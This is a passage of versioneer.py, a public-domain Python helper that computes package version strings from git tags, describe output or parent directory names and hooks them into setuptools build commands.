VCS systems, reducing the number of intermediate scripts. ## License To make Versioneer easier to embed, all its code is dedicated to the public domain. The `_version.py` that it creates is also in the public domain. Specifically, both are released under the Creative Commons "Public Domain Dedication" license (CC0-1.0), as described in https://creativecommons.org/publicdomain/zero/1.0/ . """ from __future__ import print_function try: import configparser except ImportError: import ConfigParser as configparser import errno import json import os import re import subprocess import sys class VersioneerConfig: """Container for Versioneer configuration parameters.""" def get_root(): """Get the project root directory. We require that all commands are run from the project root, i.e. the directory that contains setup.py, setup.cfg, and versioneer.py . """ root = os.path.realpath(os.path.abspath(os.getcwd())) setup_py = os.path.join(root, "setup.py") versioneer_py = os.path.join(root, "versioneer.py") if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)): # allow 'python path/to/setup.py COMMAND' root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0]))) setup_py = os.path.join(root, "setup.py") versioneer_py = os.path.join(root, "versioneer.py") if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)): err = ("Versioneer was unable to run the project root directory. " "Versioneer requires setup.py to be executed from " "its immediate directory (like 'python setup.py COMMAND'), " "or in a way that lets it use sys.argv[0] to find the root " "(like 'python path/to/setup.py COMMAND').") raise VersioneerBadRootError(err) try: # Certain runtime workflows (setup.py install/develop in a setuptools # tree) execute all dependencies in a single python process, so # "versioneer" may be imported multiple times, and python's shared # module-import table will cache the first one. So we can't use # os.path.dirname(__file__), as that will find whichever # versioneer.py was first imported, even in later projects. me = os.path.realpath(os.path.abspath(__file__)) if os.path.splitext(me)[0] != os.path.splitext(versioneer_py)[0]: print("Warning: build in %s is using versioneer.py from %s" % (os.path.dirname(me), versioneer_py)) except NameError: pass return root def get_config_from_root(root): """Read the project setup.cfg file to determine Versioneer config.""" # This might raise EnvironmentError (if setup.cfg is missing), or # configparser.NoSectionError (if it lacks a [versioneer] section), or # configparser.NoOptionError (if it lacks "VCS="). See the docstring at # the top of versioneer.py for instructions on writing your setup.cfg . setup_cfg = os.path.join(root, "setup.cfg") parser = configparser.SafeConfigParser() with open(setup_cfg, "r") as f: parser.readfp(f) VCS = parser.get("versioneer", "VCS") # mandatory def get(parser, name): if parser.has_option("versioneer", name): return parser.get("versioneer", name) return None cfg = VersioneerConfig() cfg.VCS = VCS cfg.style = get(parser, "style") or "" cfg.versionfile_source = get(parser, "versionfile_source") cfg.versionfile_build = get(parser, "versionfile_build") cfg.tag_prefix = get(parser, "tag_prefix") if cfg.tag_prefix in ("''", '""'): cfg.tag_prefix = "" cfg.parentdir_prefix = get(parser, "parentdir_prefix") cfg.verbose = get(parser, "verbose") return cfg class NotThisMethod(Exception): """Exception raised if a method is not valid for the current scenario.""" # these dictionaries contain VCS-specific tools LONG_VERSION_PY = {} HANDLERS = {} def register_vcs_handler(vcs, method): # decorator """Decorator to mark a method as the handler for a particular VCS.""" def decorate(f): """Store f in HANDLERS[vcs][method].""" if vcs not in HANDLERS: HANDLERS[vcs] = {} HANDLERS[vcs][method] = f return f return decorate def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False): """Call the given command(s).""" assert isinstance(commands, list) p = None for c in commands: try: dispcmd = str([c] + args) # remember shell=False, so use git.cmd on windows, not just git p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE, stderr=(subprocess.PIPE if hide_stderr else None)) break except EnvironmentError: e = sys.exc_info()[1] if e.errno == errno.ENOENT: continue if verbose: print("unable to run %s" % dispcmd) print(e) return None else: if verbose: print("unable to find command, tried %s" % (commands,)) return None stdout = p.communicate()[0].strip() if sys.version_info[0] >= 3: stdout = stdout.decode() if p.returncode != 0: if verbose: print("unable to run %s (error)" % dispcmd) return None return stdout LONG_VERSION_PY['git'] = ''' # This file helps to compute a version number in source trees obtained from # git-archive tarball (such as those provided by githubs download-from-tag # feature). Distribution tarballs (built by setup.py sdist) and build # directories (produced by setup.py build) will contain a much shorter file # that just contains the computed version number. # This file is released into the public domain. Generated by # versioneer-0.15+dev (https://github.com/warner/python-versioneer) """Git implementation of _version.py.""" import errno import os import re import subprocess import sys def get_keywords(): """Get the keywords needed to look up the version information.""" # these strings will be replaced by git during git-archive. # setup.py/versioneer.py will grep for the variable names, so they must # each be defined on a line of their own. _version.py will just call # get_keywords(). git_refnames = "%(DOLLAR)sFormat:%%d%(DOLLAR)s" git_full = "%(DOLLAR)sFormat:%%H%(DOLLAR)s" keywords = {"refnames": git_refnames, "full": git_full} return keywords class VersioneerConfig: """Container for Versioneer configuration parameters.""" def get_config(): """Create, populate and return the VersioneerConfig() object.""" # these strings are filled in when 'setup.py versioneer' creates # _version.py cfg = VersioneerConfig() cfg.VCS = "git" cfg.style = "%(STYLE)s" cfg.tag_prefix = "%(TAG_PREFIX)s" cfg.parentdir_prefix = "%(PARENTDIR_PREFIX)s" cfg.versionfile_source = "%(VERSIONFILE_SOURCE)s" cfg.verbose = False return cfg class NotThisMethod(Exception): """Exception raised if a method is not valid for the current scenario.""" LONG_VERSION_PY = {} HANDLERS = {} def register_vcs_handler(vcs, method): # decorator """Decorator to mark a method as the handler for a particular VCS.""" def decorate(f): """Store f in HANDLERS[vcs][method].""" if vcs not in HANDLERS: HANDLERS[vcs] = {} HANDLERS[vcs][method] = f return f return decorate def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False): """Call the given command(s).""" assert isinstance(commands, list) p = None for c in commands: try: dispcmd = str([c] + args) # remember shell=False, so use git.cmd on windows, not just git p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE, stderr=(subprocess.PIPE if hide_stderr else None)) break except EnvironmentError: e = sys.exc_info()[1] if e.errno == errno.ENOENT: continue if verbose: print("unable to run %%s" %% dispcmd) print(e) return None else: if verbose: print("unable to find command, tried %%s" %% (commands,)) return None stdout = p.communicate()[0].strip() if sys.version_info[0] >= 3: stdout = stdout.decode() if p.returncode != 0: if verbose: print("unable to run %%s (error)" %% dispcmd) return None return stdout def versions_from_parentdir(parentdir_prefix, root, verbose): """Try to determine the version from the parent directory name. Source tarballs conventionally unpack into a directory that includes both the project name and a version string. """ dirname = os.path.basename(root) if not dirname.startswith(parentdir_prefix): if verbose: print("guessing rootdir is '%%s', but '%%s' doesn't start with " "prefix '%%s'" %% (root, dirname, parentdir_prefix)) raise NotThisMethod("rootdir doesn't start with parentdir_prefix") return {"version": dirname[len(parentdir_prefix):], "full-revisionid": None, "dirty": False, "error": None} @register_vcs_handler("git", "get_keywords") def git_get_keywords(versionfile_abs): """Extract version information from the given file.""" # the code embedded in _version.py can just fetch the value of these # keywords. When used from setup.py, we don't want to import _version.py, # so we do it with a regexp instead. This function is not used from # _version.py. keywords = {} try: f = open(versionfile_abs, "r") for line in f.readlines(): if line.strip().startswith("git_refnames ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["refnames"] = mo.group(1) if line.strip().startswith("git_full ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["full"] = mo.group(1) f.close() except EnvironmentError: pass return keywords @register_vcs_handler("git", "keywords") def git_versions_from_keywords(keywords, tag_prefix, verbose): """Get version information from git keywords.""" if not keywords: raise NotThisMethod("no keywords at all, weird") refnames = keywords["refnames"].strip() if refnames.startswith("$Format"): if verbose: print("keywords are unexpanded, not using") raise NotThisMethod("unexpanded keywords, not a git-archive tarball") refs = set([r.strip() for r in refnames.strip("()").split(",")]) # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of # just "foo-1.0". If we see a "tag: " prefix, prefer those. TAG = "tag: " tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)]) if not tags: # Either we're using git < 1.8.3, or there really are no tags. We use # a heuristic: assume all version tags have a digit. The old git %%d # expansion behaves like git log --decorate=short and strips out the # refs/heads/ and refs/tags/ prefixes that would let us distinguish # between branches and tags. By ignoring refnames without digits, we # filter out many common branch names like "release" and # "stabilization", as well as "HEAD" and "master". tags = set([r for r in refs if re.search(r'\d', r)]) if verbose: print("discarding '%%s', no digits" %% ",".join(refs-tags)) if verbose: print("likely tags: %%s" %% ",".join(sorted(tags))) for ref in sorted(tags): # sorting will prefer e.g. "2.0" over "2.0rc1" if ref.startswith(tag_prefix): r = ref[len(tag_prefix):] if verbose: print("picking %%s" %% r) return {"version": r, "full-revisionid": keywords["full"].strip(), "dirty": False, "error": None } # no suitable tags, so version is "0+unknown", but full hex is still there if verbose: print("no suitable tags, using unknown + full revision id") return {"version": "0+unknown", "full-revisionid": keywords["full"].strip(), "dirty": False, "error": "no suitable tags"} @register_vcs_handler("git", "pieces_from_vcs") def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command): """Get version from 'git describe' in the root of the source tree. This only gets called if the git-archive 'subst' keywords were *not* expanded, and _version.py hasn't already been rewritten with a short version string, meaning we're inside a checked out source tree. """ if not os.path.exists(os.path.join(root, ".git")): if verbose: print("no .git in %%s" %% root) raise NotThisMethod("no .git directory") GITS = ["git"] if sys.platform == "win32": GITS = ["git.cmd", "git.exe"] # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty] # if there isn't one, this yields HEX[-dirty] (no NUM) describe_out = run_command(GITS, ["describe", "--tags", "--dirty", "--always", "--long", "--match", "%%s*" %% tag_prefix], cwd=root) # --long was added in git-1.5.5 if describe_out is None: raise NotThisMethod("'git describe' failed") describe_out = describe_out.strip() full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root) if full_out is None: raise NotThisMethod("'git rev-parse' failed") full_out = full_out.strip() pieces = {} pieces["long"] = full_out pieces["short"] = full_out[:7] # maybe improved later pieces["error"] = None # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty] # TAG might have hyphens. git_describe = describe_out # look for -dirty suffix dirty = git_describe.endswith("-dirty") pieces["dirty"] = dirty if dirty: git_describe = git_describe[:git_describe.rindex("-dirty")] # now we have TAG-NUM-gHEX or HEX if "-" in git_describe: # TAG-NUM-gHEX mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe) if not mo: # unparseable. Maybe git-describe is misbehaving? pieces["error"] = ("unable to parse git-describe output: '%%s'" %% describe_out) return pieces # tag full_tag = mo.group(1) if not full_tag.startswith(tag_prefix): if verbose: fmt = "tag '%%s' doesn't start with prefix '%%s'" print(fmt %% (full_tag, tag_prefix)) pieces["error"] = ("tag '%%s' doesn't start with prefix '%%s'" %% (full_tag, tag_prefix)) return pieces pieces["closest-tag"] = full_tag[len(tag_prefix):] # distance: number of commits since tag pieces["distance"] = int(mo.group(2)) # commit: short hex revision ID pieces["short"] = mo.group(3) else: # HEX: no tags pieces["closest-tag"] = None count_out = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root) pieces["distance"] = int(count_out) # total number of commits return pieces def plus_or_dot(pieces): """Return a + if we don't already have one, else return a .""" if "+" in pieces.get("closest-tag", ""): return "." return "+" def render_pep440(pieces): """Build up version string, with post-release "local version identifier". Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty Exceptions: 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += plus_or_dot(pieces) rendered += "%%d.g%%s" %% (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" else: # exception #1 rendered = "0+untagged.%%d.g%%s" %% (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" return rendered def render_pep440_pre(pieces): """TAG[.post.devDISTANCE] -- No -dirty. Exceptions: 1: no tags. 0.post.devDISTANCE """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += ".post.dev%%d" %% pieces["distance"] else: # exception #1 rendered = "0.post.dev%%d" %% pieces["distance"] return rendered def render_pep440_post(pieces): """TAG[.postDISTANCE[.dev0]+gHEX] . The ".dev0" means dirty. Note that .dev0 sorts backwards (a dirty tree will appear "older" than the corresponding clean one), but you shouldn't be releasing software with -dirty anyways. Exceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%%d" %% pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += plus_or_dot(pieces) rendered += "g%%s" %% pieces["short"] else: # exception #1 rendered = "0.post%%d" %% pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += "+g%%s" %% pieces["short"] return rendered def render_pep440_old(pieces): """TAG[.postDISTANCE[.dev0]] . The ".dev0" means dirty. Eexceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%%d" %% pieces["distance"] if pieces["dirty"]: rendered += ".dev0" else: # exception #1 rendered = "0.post%%d" %% pieces["distance"] if pieces["dirty"]: rendered += ".dev0" return rendered def render_git_describe(pieces): """TAG[-DISTANCE-gHEX][-dirty]. Like 'git describe --tags --dirty --always'. Exceptions: 1: no tags. HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += "-%%d-g%%s" %% (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render_git_describe_long(pieces): """TAG-DISTANCE-gHEX[-dirty]. Like 'git describe --tags --dirty --always -long'. The distance/hash is unconditional. Exceptions: 1: no tags. HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] rendered += "-%%d-g%%s" %% (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render(pieces, style): """Render the given version pieces into the requested style.""" if pieces["error"]: return {"version": "unknown", "full-revisionid": pieces.get("long"), "dirty": None, "error": pieces["error"]} if not style or style == "default": style = "pep440" # the default if style == "pep440": rendered = render_pep440(pieces) elif style == "pep440-pre": rendered = render_pep440_pre(pieces) elif style == "pep440-post": rendered = render_pep440_post(pieces) elif style == "pep440-old": rendered = render_pep440_old(pieces) elif style == "git-describe": rendered = render_git_describe(pieces) elif style == "git-describe-long": rendered = render_git_describe_long(pieces) else: raise ValueError("unknown style '%%s'" %% style) return {"version": rendered, "full-revisionid": pieces["long"], "dirty": pieces["dirty"], "error": None} def get_versions(): """Get version information or return default if unable to do so.""" # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have # __file__, we can work backwards from there to the root. Some # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which # case we can only use expanded keywords. cfg = get_config() verbose = cfg.verbose try: return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose) except NotThisMethod: pass try: root = os.path.realpath(__file__) # versionfile_source is the relative path from the top of the source # tree (where the .git directory might live) to this file. Invert # this to find the root from __file__. for i in cfg.versionfile_source.split('/'): root = os.path.dirname(root) except NameError: return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to find root of source tree"} try: pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose) return render(pieces, cfg.style) except NotThisMethod: pass try: if cfg.parentdir_prefix: return versions_from_parentdir(cfg.parentdir_prefix, root, verbose) except NotThisMethod: pass return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to compute version"} ''' @register_vcs_handler("git", "get_keywords") def git_get_keywords(versionfile_abs): """Extract version information from the given file.""" # the code embedded in _version.py can just fetch the value of these # keywords. When used from setup.py, we don't want to import _version.py, # so we do it with a regexp instead. This function is not used from # _version.py. keywords = {} try: f = open(versionfile_abs, "r") for line in f.readlines(): if line.strip().startswith("git_refnames ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["refnames"] = mo.group(1) if line.strip().startswith("git_full ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["full"] = mo.group(1) f.close() except EnvironmentError: pass return keywords @register_vcs_handler("git", "keywords") def git_versions_from_keywords(keywords, tag_prefix, verbose): """Get version information from git keywords.""" if not keywords: raise NotThisMethod("no keywords at all, weird") refnames = keywords["refnames"].strip() if refnames.startswith("$Format"): if verbose: print("keywords are unexpanded, not using") raise NotThisMethod("unexpanded keywords, not a git-archive tarball") refs = set([r.strip() for r in refnames.strip("()").split(",")]) # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of # just "foo-1.0". If we see a "tag: " prefix, prefer those. TAG = "tag: " tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)]) if not tags: # Either we're using git < 1.8.3, or there really are no tags. We use # a heuristic: assume all version tags have a digit. The old git %d # expansion behaves like git log --decorate=short and strips out the # refs/heads/ and refs/tags/ prefixes that would let us distinguish # between branches and tags. By ignoring refnames without digits, we # filter out many common branch names like "release" and # "stabilization", as well as "HEAD" and "master". tags = set([r for r in refs if re.search(r'\d', r)]) if verbose: print("discarding '%s', no digits" % ",".join(refs-tags)) if verbose: print("likely tags: %s" % ",".join(sorted(tags))) for ref in sorted(tags): # sorting will prefer e.g. "2.0" over "2.0rc1" if ref.startswith(tag_prefix): r = ref[len(tag_prefix):] if verbose: print("picking %s" % r) return {"version": r, "full-revisionid": keywords["full"].strip(), "dirty": False, "error": None } # no suitable tags, so version is "0+unknown", but full hex is still there if verbose: print("no suitable tags, using unknown + full revision id") return {"version": "0+unknown", "full-revisionid": keywords["full"].strip(), "dirty": False, "error": "no suitable tags"} @register_vcs_handler("git", "pieces_from_vcs") def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command): """Get version from 'git describe' in the root of the source tree. This only gets called if the git-archive 'subst' keywords were *not* expanded, and _version.py hasn't already been rewritten with a short version string, meaning we're inside a checked out source tree. """ if not os.path.exists(os.path.join(root, ".git")): if verbose: print("no .git in %s" % root) raise NotThisMethod("no .git directory") GITS = ["git"] if sys.platform == "win32": GITS = ["git.cmd", "git.exe"] # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty] # if there isn't one, this yields HEX[-dirty] (no NUM) describe_out = run_command(GITS, ["describe", "--tags", "--dirty", "--always", "--long", "--match", "%s*" % tag_prefix], cwd=root) # --long was added in git-1.5.5 if describe_out is None: raise NotThisMethod("'git describe' failed") describe_out = describe_out.strip() full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root) if full_out is None: raise NotThisMethod("'git rev-parse' failed") full_out = full_out.strip() pieces = {} pieces["long"] = full_out pieces["short"] = full_out[:7] # maybe improved later pieces["error"] = None # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty] # TAG might have hyphens. git_describe = describe_out # look for -dirty suffix dirty = git_describe.endswith("-dirty") pieces["dirty"] = dirty if dirty: git_describe = git_describe[:git_describe.rindex("-dirty")] # now we have TAG-NUM-gHEX or HEX if "-" in git_describe: # TAG-NUM-gHEX mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe) if not mo: # unparseable. Maybe git-describe is misbehaving? pieces["error"] = ("unable to parse git-describe output: '%s'" % describe_out) return pieces # tag full_tag = mo.group(1) if not full_tag.startswith(tag_prefix): if verbose: fmt = "tag '%s' doesn't start with prefix '%s'" print(fmt % (full_tag, tag_prefix)) pieces["error"] = ("tag '%s' doesn't start with prefix '%s'" % (full_tag, tag_prefix)) return pieces pieces["closest-tag"] = full_tag[len(tag_prefix):] # distance: number of commits since tag pieces["distance"] = int(mo.group(2)) # commit: short hex revision ID pieces["short"] = mo.group(3) else: # HEX: no tags pieces["closest-tag"] = None count_out = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root) pieces["distance"] = int(count_out) # total number of commits return pieces def do_vcs_install(manifest_in, versionfile_source, ipy): """Git-specific installation logic for Versioneer. For Git, this means creating/changing .gitattributes to mark _version.py for export-time keyword substitution. """ GITS = ["git"] if sys.platform == "win32": GITS = ["git.cmd", "git.exe"] files = [manifest_in, versionfile_source] if ipy: files.append(ipy) try: me = __file__ if me.endswith(".pyc") or me.endswith(".pyo"): me = os.path.splitext(me)[0] + ".py" versioneer_file = os.path.relpath(me) except NameError: versioneer_file = "versioneer.py" files.append(versioneer_file) present = False try: f = open(".gitattributes", "r") for line in f.readlines(): if line.strip().startswith(versionfile_source): if "export-subst" in line.strip().split()[1:]: present = True f.close() except EnvironmentError: pass if not present: f = open(".gitattributes", "a+") f.write("%s export-subst\n" % versionfile_source) f.close() files.append(".gitattributes") run_command(GITS, ["add", "--"] + files) def versions_from_parentdir(parentdir_prefix, root, verbose): """Try to determine the version from the parent directory name. Source tarballs conventionally unpack into a directory that includes both the project name and a version string. """ dirname = os.path.basename(root) if not dirname.startswith(parentdir_prefix): if verbose: print("guessing rootdir is '%s', but '%s' doesn't start with " "prefix '%s'" % (root, dirname, parentdir_prefix)) raise NotThisMethod("rootdir doesn't start with parentdir_prefix") return {"version": dirname[len(parentdir_prefix):], "full-revisionid": None, "dirty": False, "error": None} SHORT_VERSION_PY = """ # This file was generated by 'versioneer.py' (0.15+dev) from # revision-control system data, or from the parent directory name of an # unpacked source archive. Distribution tarballs contain a pre-generated copy # of this file. import json import sys version_json = ''' %s ''' # END VERSION_JSON def get_versions(): return json.loads(version_json) """ def versions_from_file(filename): """Try to determine the version from _version.py if present.""" try: with open(filename) as f: contents = f.read() except EnvironmentError: raise NotThisMethod("unable to read _version.py") mo = re.search(r"version_json = '''\n(.*)''' # END VERSION_JSON", contents, re.M | re.S) if not mo: raise NotThisMethod("no version_json in _version.py") return json.loads(mo.group(1)) def write_to_version_file(filename, versions): """Write the given version number to the given _version.py file.""" os.unlink(filename) contents = json.dumps(versions, sort_keys=True, indent=1, separators=(",", ": ")) with open(filename, "w") as f: f.write(SHORT_VERSION_PY % contents) print("set %s to '%s'" % (filename, versions["version"])) def plus_or_dot(pieces): """Return a + if we don't already have one, else return a .""" if "+" in pieces.get("closest-tag", ""): return "." return "+" def render_pep440(pieces): """Build up version string, with post-release "local version identifier". Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty Exceptions: 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += plus_or_dot(pieces) rendered += "%d.g%s" % (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" else: # exception #1 rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" return rendered def render_pep440_pre(pieces): """TAG[.post.devDISTANCE] -- No -dirty. Exceptions: 1: no tags. 0.post.devDISTANCE """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += ".post.dev%d" % pieces["distance"] else: # exception #1 rendered = "0.post.dev%d" % pieces["distance"] return rendered def render_pep440_post(pieces): """TAG[.postDISTANCE[.dev0]+gHEX] . The ".dev0" means dirty. Note that .dev0 sorts backwards (a dirty tree will appear "older" than the corresponding clean one), but you shouldn't be releasing software with -dirty anyways. Exceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += plus_or_dot(pieces) rendered += "g%s" % pieces["short"] else: # exception #1 rendered = "0.post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += "+g%s" % pieces["short"] return rendered def render_pep440_old(pieces): """TAG[.postDISTANCE[.dev0]] . The ".dev0" means dirty. Eexceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" else: # exception #1 rendered = "0.post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" return rendered def render_git_describe(pieces): """TAG[-DISTANCE-gHEX][-dirty]. Like 'git describe --tags --dirty --always'. Exceptions: 1: no tags. HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += "-%d-g%s" % (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render_git_describe_long(pieces): """TAG-DISTANCE-gHEX[-dirty]. Like 'git describe --tags --dirty --always -long'. The distance/hash is unconditional. Exceptions: 1: no tags. HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] rendered += "-%d-g%s" % (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render(pieces, style): """Render the given version pieces into the requested style.""" if pieces["error"]: return {"version": "unknown", "full-revisionid": pieces.get("long"), "dirty": None, "error": pieces["error"]} if not style or style == "default": style = "pep440" # the default if style == "pep440": rendered = render_pep440(pieces) elif style == "pep440-pre": rendered = render_pep440_pre(pieces) elif style == "pep440-post": rendered = render_pep440_post(pieces) elif style == "pep440-old": rendered = render_pep440_old(pieces) elif style == "git-describe": rendered = render_git_describe(pieces) elif style == "git-describe-long": rendered = render_git_describe_long(pieces) else: raise ValueError("unknown style '%s'" % style) return {"version": rendered, "full-revisionid": pieces["long"], "dirty": pieces["dirty"], "error": None} class VersioneerBadRootError(Exception): """The project root directory is unknown or missing key files.""" def get_versions(verbose=False): """Get the project version from whatever source is available. Returns dict with two keys: 'version' and 'full'. """ if "versioneer" in sys.modules: # see the discussion in cmdclass.py:get_cmdclass() del sys.modules["versioneer"] root = get_root() cfg = get_config_from_root(root) assert cfg.VCS is not None, "please set [versioneer]VCS= in setup.cfg" handlers = HANDLERS.get(cfg.VCS) assert handlers, "unrecognized VCS '%s'" % cfg.VCS verbose = verbose or cfg.verbose assert cfg.versionfile_source is not None, \ "please set versioneer.versionfile_source" assert cfg.tag_prefix is not None, "please set versioneer.tag_prefix" versionfile_abs = os.path.join(root, cfg.versionfile_source) # extract version from first of: _version.py, VCS command (e.g. 'git # describe'), parentdir. This is meant to work for developers using a # source checkout, for users of a tarball created by 'setup.py sdist', # and for users of a tarball/zipball created by 'git archive' or github's # download-from-tag feature or the equivalent in other VCSes. get_keywords_f = handlers.get("get_keywords") from_keywords_f = handlers.get("keywords") if get_keywords_f and from_keywords_f: try: keywords = get_keywords_f(versionfile_abs) ver = from_keywords_f(keywords, cfg.tag_prefix, verbose) if verbose: print("got version from expanded keyword %s" % ver) return ver except NotThisMethod: pass try: ver = versions_from_file(versionfile_abs) if verbose: print("got version from file %s %s" % (versionfile_abs, ver)) return ver except NotThisMethod: pass from_vcs_f = handlers.get("pieces_from_vcs") if from_vcs_f: try: pieces = from_vcs_f(cfg.tag_prefix, root, verbose) ver = render(pieces, cfg.style) if verbose: print("got version from VCS %s" % ver) return ver except NotThisMethod: pass try: if cfg.parentdir_prefix: ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose) if verbose: print("got version from parentdir %s" % ver) return ver except NotThisMethod: pass if verbose: print("unable to compute version") return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to compute version"} def get_version(): """Get the short version string for this project.""" return get_versions()["version"] def get_cmdclass(): """Get the custom setuptools/distutils subclasses used by Versioneer.""" if "versioneer" in sys.modules: del sys.modules["versioneer"] # this fixes the "python setup.py develop" case (also 'install' and # 'easy_install .'), in which subdependencies of the main project are # built (using setup.py bdist_egg) in the same python process. Assume # a main project A and a dependency B, which use different versions # of Versioneer. A's setup.py imports A's Versioneer, leaving it in # sys.modules by the time B's setup.py is executed, causing B to run # with the wrong versioneer. Setuptools wraps the sub-dep builds in a # sandbox that restores sys.modules to it's pre-build state, so the # parent is protected against the child's "import versioneer". By # removing ourselves from sys.modules here, before the child build # happens, we protect the child from the parent's versioneer too. # Also see https://github.com/warner/python-versioneer/issues/52 cmds = {} # we add "version" to both distutils and setuptools from distutils.core import Command class cmd_version(Command): description = "report generated version string" user_options = [] boolean_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): vers = get_versions(verbose=True) print("Version: %s" % vers["version"]) print(" full-revisionid: %s" % vers.get("full-revisionid")) print(" dirty: %s" % vers.get("dirty")) if vers["error"]: print(" error: %s" % vers["error"]) cmds["version"] = cmd_version # we override "build_py" in both distutils and setuptools # # most invocation pathways end up running build_py: # distutils/build -> build_py # distutils/install -> distutils/build ->.. # setuptools/bdist_wheel -> distutils/install ->.. # setuptools/bdist_egg -> distutils/install_lib -> build_py # setuptools/install -> bdist_egg ->.. # setuptools/develop -> ? # we override different "build_py" commands for both environments if "setuptools" in sys.modules: from setuptools.command.build_py import build_py as _build_py else: from distutils.command.build_py import build_py as _build_py class cmd_build_py(_build_py): def run(self): root = get_root() cfg = get_config_from_root(root) versions = get_versions() _build_py.run(self) # now locate _version.py in the new build/ directory and replace # it with an updated value if cfg.versionfile_build: target_versionfile = os.path.join(self.build_lib, cfg.versionfile_build) print("UPDATING %s" % target_versionfile) write_to_version_file(target_versionfile, versions) cmds["build_py"] = cmd_build_py if "cx_Freeze" in sys.modules: # cx_freeze enabled? from cx_Freeze.dist import build_exe as _build_exe class cmd_build_exe(_build_exe): def run(self): root = get_root() cfg = get_config_from_root(root) versions = get_versions() target_versionfile = cfg.versionfile_source print("UPDATING %s" % target_versionfile) write_to_version_file(target_versionfile, versions) _build_exe.run(self) os.unlink(target_versionfile) with open(cfg.versionfile_source, "w") as f: LONG = LONG_VERSION_PY[cfg.VCS] f.write(LONG % {"DOLLAR": "$", "STYLE": cfg.style, "TAG_PREFIX": cfg.tag_prefix, "PARENTDIR_PREFIX": cfg.parentdir_prefix, "VERSIONFILE_SOURCE": cfg.versionfile_source, }) 